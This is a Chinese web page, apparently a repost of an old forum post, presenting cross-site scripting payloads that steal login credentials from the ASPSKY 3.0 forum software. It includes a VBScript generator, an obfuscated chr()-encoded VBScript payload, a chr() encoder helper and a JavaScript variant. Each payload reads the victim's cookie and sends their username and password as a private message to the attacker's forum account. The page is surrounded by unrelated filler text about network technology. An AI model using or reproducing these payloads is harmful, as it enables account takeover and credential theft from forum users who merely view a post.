争怎路由网/杀毒教程/内容

圆满的处理跨站脚本弹框框

杀毒教程2024-03-03 阅读
网络技术是从1990年代中期发展起来的新技术,它把互联网上分散的资源融为有机整体,实现资源的全面共享和有机协作,使人们能够透明地使用资源的整体能力并按需获取信息。资源包括高性能计算机、存储资源、数据资源、信息资源、知识资源、专家资源、大型数据库、网络、传感器等。 当前的互联网只限于信息共享,网络则被认为是互联网发展的第三阶段。

完美的解决跨站脚本得COOKIE弹框框的问题 
同时把密码用户名发到你在论坛的邮相里,爽吧 

 

先头看到欲望之翼的self.window的办法 
其实我一直有个从来没给任何人说的办法: 
玩了好久了公布了呵呵: 
   
<html> 
<script language=vbs> 
sub changeq() 
if form1.loc.value="" or form1.who.value="" then 
msgbox "没有加入地址或用户名?" 
exit sub 
end if 
loc=form1.loc.value 
user=form1.who.value 
str="[img]vbscript:execute("on error resume next: call document.body.inse 
rtAdjacentHTML(""beforeEnd"",""<div style=display:none& 
gt;<iframe id=sendmessage></iframe></div>""):call se 
ndmessage.window.open(""" & loc & "/messanger.asp?action=send&touser=" 
& user & "&title=""+mid(document.cookie,instr(lcase(document.cookie), 
""password"")+9,10)+""&message=""+""I am a goo 
d boy"",""_self"")  ")[/img]" 
form1.area.value=str 
end sub 

</script> 
<body> 
<FONT SIZE=7 COLOR=RED>ASPSKY 3.0 偷号器---C.Z.Y原创</FONT> 
<form name=form1> 
设置发送地址:<input type=text name=loc size=50><br> 
▲注意发送地址形如:http://www.nnit30.com/newbbs(newbbs是网站中论坛的安装目录 
最后 
不用加/)<br> 
发送的用户名:<input type=text name=who size=20>------------- 
<input type=button name=change value=生成代码 onclick=changeq()><br> 
生成的代码:)<textarea name=area rows=10 cols=100></textarea> 
</form> 
</body> 
</html> 

搞了大半天的结果,偷aspsky 3.0 密码的东东把下面的代码改一改 
然后发到你的贴子里,只要有人看你的贴子他的密码就自动发到你的在 
论坛上的邮箱里了,爽吧,其实我的是用VBScript写的snwcwt用javascript 
写的没有双引号的问题而且可以同时写几行代码所以要实用一些!! 
  不过效果都差不多哈:)(注意要先把下面的东东改一下发送的地址然 
后全部写在一行里) 
   
[img]vbscript:window.open(chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&ch 
r(47)&chr(119)&chr(119)&chr(119)&chr(46)&chr(110)&chr(110)&chr(105)&chr(116)&chr 
(51)&chr(48)&chr(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(110)&chr(101)&chr(119 
)&chr(98)&chr(98)&chr(115)&chr(47)&chr(109)&chr(101)&chr(115)&chr(115)&chr(97)&c 
hr(110)&chr(103)&chr(101)&chr(114)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr 
(97)&chr(99)&chr(116)&chr(105)&chr(111)&chr(110)&chr(61)&chr(115)&chr(101)&chr(1 
10)&chr(100)&chr(38)&chr(116)&chr(111)&chr(117)&chr(115)&chr(101)&chr(114)&chr(6 
1)&chr(99)&chr(122)&chr(121)&chr(38)&chr(116)&chr(105)&chr(116)&chr(108)&chr(101 
)&chr(61)&chr(104)&chr(105)&chr(104)&chr(105)&chr(38)&chr(109)&chr(101)&chr(115) 
&chr(115)&chr(97)&chr(103)&chr(101)&chr(61)+chr(80)&chr(97)&chr(115)&chr(115)&ch 
r(58)+mid(lcase(document.cookie),instr(lcase(document.cookie),chr(112)+chr(97)+c 
hr(115)+chr(115)+chr(119)+chr(111)+chr(114)+chr(100))+9,len(document.cookie)-ins 
tr(lcase(document.cookie),chr(112)+chr(97)+chr(115)+chr(115)+chr(119)+chr(111)+c 
hr(114)+chr(100))+9)+chr(32)+chr(32)+chr(32)+chr(32)+chr(78)&chr(97)&chr(109)&ch 
r(101)&chr(58)+mid(lcase(document.cookie),instr(lcase(document.cookie),chr(117)+ 
chr(115)+chr(101)+chr(114)+chr(110)+chr(97)+chr(109)+chr(101))+9,(instr(lcase(do 
cument.cookie),chr(117)+chr(115)+chr(101)+chr(114)+chr(99)+chr(108)+chr(97)+chr( 
115))-1)-instr(lcase(document.cookie),chr(117)+chr(115)+chr(101)+chr(114)+chr(11 
0)+chr(97)+chr(109)+chr(101))-9),chr(49)&chr(49),chr(116)&chr(111)&chr(112)&chr( 
61)&chr(50)&chr(48)&chr(48)&chr(48)&chr(44)&chr(108)&chr(101)&chr(102)&chr(116)& 
chr(61)&chr(50)&chr(48)&chr(48)&chr(48)&chr(44)&chr(104)&chr(101)&chr(105)&chr(1 
03)&chr(104)&chr(116)&chr(61)&chr(49)&chr(44)&chr(119)&chr(105)&chr(100)&chr(116 
)&chr(104)&chr(61)&chr(49))[/img] 
简化形式:window.open(打开的连接,窗体名,窗体大小设置) 
打开的连接: 
第一部份:http://xxx.xxx.xxx.xxx/xxxx/messanger.asp?action=send..... 
对应编码为:chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(119)& 
chr(119)&chr(119)&chr(46)&chr(110)&chr(110)&chr(105)&chr(116)&chr(51)&chr(48)&ch 
r(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(110)&chr(101)&chr(119)&chr(98)&chr(9 
8)&chr(115)&chr(47)&chr(109)&chr(101)&chr(115)&chr(115)&chr(97)&chr(110)&chr(103 
)&chr(101)&chr(114)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr(97)&chr(99)&ch 
r(116)&chr(105)&chr(111)&chr(110)&chr(61)&chr(115)&chr(101)&chr(110)&chr(100)&ch 
r(38)&chr(116)&chr(111)&chr(117)&chr(115)&chr(101)&chr(114)&chr(61)&chr(99)&chr( 
122)&chr(121)&chr(38)&chr(116)&chr(105)&chr(116)&chr(108)&chr(101)&chr(61)&chr(1 
04)&chr(105)&chr(104)&chr(105)&chr(38)&chr(109)&chr(101)&chr(115)&chr(115)&chr(9 
7)&chr(103)&chr(101)&chr(61) 
不同的网站要自已改注意在哪儿结束同时还有发到的用户名都在这儿改 
对于编码看如下代码: 
<html> 
<script language=vbs> 
sub main() 
base=form1.text1.value 
for i=1 to len(base) 
aa=asc(mid(base,i,1)) 
document.write "chr(" & aa & ")" & "&" 
next 
end sub 
</script> 
<body ><form name=form1><table> 
<tr><td> 
<input type=text name=text1 size=40><br> 
<input type=button name=button1 onclick=main() value=change> 
</td></tr> 
</table></form></body></html> 
   

第二部份:为提取的COOKIE中的用户名和密码 

------------------------再来一个js的放便学习---------------------------------- 
[img]javascript:eval('var myCookie=document.cookie;var iUser0=myCookie.indexOf(\ 
'username=\');var iUser1=myCookie.indexOf(\'&\',iUser0);if(iUser1==-1) iUser1=my 
Cookie.length;var username=myCookie.substring(iUser0+9,iUser1);var iPW0=myCookie 
.indexOf(\'password=\');iPW1=myCookie.indexOf(\'&\',iPW0);if(iPW1==-1) iPW1=myCo 
okie.length;var password=myCookie.substring(iPW0+9,iPW1);document.body.insertAdj 
acentHTML(\'BeforeEnd\',\'<div style=display:block><iframe id=sendmessage src=me 
ssanger.asp?action=new&touser=snwcwt></iframe></div>\');sendmessage.window.docum 
ent.location=\'http://www.nnit30.com/newbbs/messanger.asp?action=send&touser=snw 
cwt&title=\'+username+\'的密码&message=username=\'+username+\'    password=\'+pa 
ssword+\'\';')[/img] 
网络的神奇作用吸引着越来越多的用户加入其中,正因如此,网络的承受能力也面临着越来越严峻的考验―从硬件上、软件上、所用标准上......,各项技术都需要适时应势,对应发展,这正是网络迅速走向进步的催化剂。



……

相关阅读